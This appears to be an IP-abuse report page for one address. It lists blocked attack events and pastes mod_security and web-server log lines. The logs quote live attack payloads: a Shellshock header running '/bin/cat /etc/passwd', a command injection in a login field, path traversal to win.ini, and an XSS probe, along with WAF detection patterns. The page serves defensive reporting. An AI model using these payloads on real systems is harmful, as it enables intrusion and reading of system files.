Anonymous
2024-11-28 05:37:53
(1 year ago)
154.30.251.87 - - [28/Nov/2024:06:37:52 +0100] "GET /wp-content/plugins/usc-e-shop/functions/content ...
show more
154.30.251.87 - - [28/Nov/2024:06:37:52 +0100] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini HTTP/1.1" 301 705 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
...
show less
Hacking
๐บ๐ธ
TPI-Abuse
2024-11-26 23:15:58
(1 year ago)
(mod_security) mod_security (id:221260) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:221260) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Nov 26 18:13:42.886632 2024] [security2:error] [pid 13651:tid 13824] [client 154.30.251.87:33595] [client 154.30.251.87] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||cpcontacts.kettlehill.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcontacts.kettlehill.com"] [uri "/cgi-bin/status/status.cgi"] [unique_id "Z0ZWJkW1wzoYD4ksSn4jZwAAAAQ"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2024-09-03 18:41:35
(1 year ago)
(mod_security) mod_security (id:211190) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:211190) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 03 14:41:10.287109 2024] [security2:error] [pid 9131:tid 9131] [client 154.30.251.87:60177] [client 154.30.251.87] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||mail.stdavids-media.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "mail.stdavids-media.com"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZtdYRlf9wjcel4c7XJuHeQAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2024-09-01 01:49:27
(1 year ago)
(mod_security) mod_security (id:240950) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:240950) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Aug 31 21:49:05.718746 2024] [security2:error] [pid 3087873:tid 3087897] [client 154.30.251.87:56809] [client 154.30.251.87] ModSecurity: Access denied with code 403 (phase 1). Pattern match "\\\\D" at TX:1. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "4530"] [id "240950"] [rev "2"] [msg "COMODO WAF: XSS & SQL injection vulnerability in Pragyan CMS 3.0 (CVE-2015-1471)||kettlehill.net|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "kettlehill.net"] [uri "/secure/QueryComponentRendererValue!Default.jspa"] [unique_id "ZtPIEVZVdRO6ImKeyeuMDQAAAFY"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2024-08-22 13:07:50
(1 year ago)
154.30.251.87 - - [22/Aug/2024:15:07:25 +0200] "GET /xmlpserver/servlet/adfresource?format=aaaaaaaaa ...
show more
154.30.251.87 - - [22/Aug/2024:15:07:25 +0200] "GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1" 404 63218 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" 82546
...
show less
Hacking
๐ฉ๐ช
ps-center
2024-07-15 19:16:42
(1 year ago)
SS1: Web Attack GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm ...
show more
SS1: Web Attack GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\"
194.113.119.161,10
show less
Web Spam
Hacking
Bad Web Bot
Web App Attack
Anonymous
2024-06-27 15:37:52
(1 year ago)
Common attack or app scan event detected and blocked
Port Scan
Hacking
Web App Attack
๐ช๐ธ
10dencehispahard SL
2024-06-27 11:00:14
(1 year ago)
Unauthorized login attempts [ accesslogs]
Brute-Force
๐บ๐ธ
TPI-Abuse
2024-06-27 07:10:15
(1 year ago)
(mod_security) mod_security (id:212750) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:212750) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jun 27 03:10:07.497363 2024] [security2:error] [pid 31724:tid 47386376275712] [client 154.30.251.87:44787] [client 154.30.251.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bon(?:abort|blur|change|click|dblclick|dragdrop|error|focus|keydown|keypress|keyup|load|mouse(?:down|move|out|over|up)|move|readystatechange|reset|resize|select|submit|unload)\\\\b[^a-zA-Z0-9_]{0,}?=" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/07_XSS_XSS.conf"] [line "69"] [id "212750"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||www.kettlehill.net|F|2"] [data "Matched Data: onload= found within REQUEST_URI: /?key='>\\x22<svg/onload=confirm('xss')>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "www.kettlehill.net"] [uri "/"] [unique_id "Zn0QT-1YCwZvqwSPAshUTAAAAU8"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ช๐ธ
10dencehispahard SL
2024-05-08 07:00:43
(2 years ago)
Unauthorized login attempts []
Brute-Force
๐ช๐ธ
10dencehispahard SL
2024-05-08 06:25:01
(2 years ago)
Web Attack
DDoS Attack
Brute-Force
Web App Attack
๐บ๐ธ
TPI-Abuse
2024-04-01 16:05:30
(2 years ago)
(mod_security) mod_security (id:210730) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:210730) triggered by 154.30.251.87 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Apr 01 12:03:34.017327 2024] [security2:error] [pid 12232:tid 47912197940992] [client 154.30.251.87:34645] [client 154.30.251.87] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||kettlehill.net|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "kettlehill.net"] [uri "/log/error.log"] [unique_id "Zgra1t4NDFRb0FgzlOx9ggAAAQQ"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ช๐ธ
10dencehispahard SL
2024-03-27 07:00:25
(2 years ago)
Unauthorized login attempts [ BI-16635]
Brute-Force
๐ช๐ธ
10dencehispahard SL
2024-03-27 06:50:04
(2 years ago)
WP scan
Web App Attack
Anonymous
2024-03-12 23:16:53
(2 years ago)
Common attack or app scan event detected and blocked
Port Scan
Hacking
Web App Attack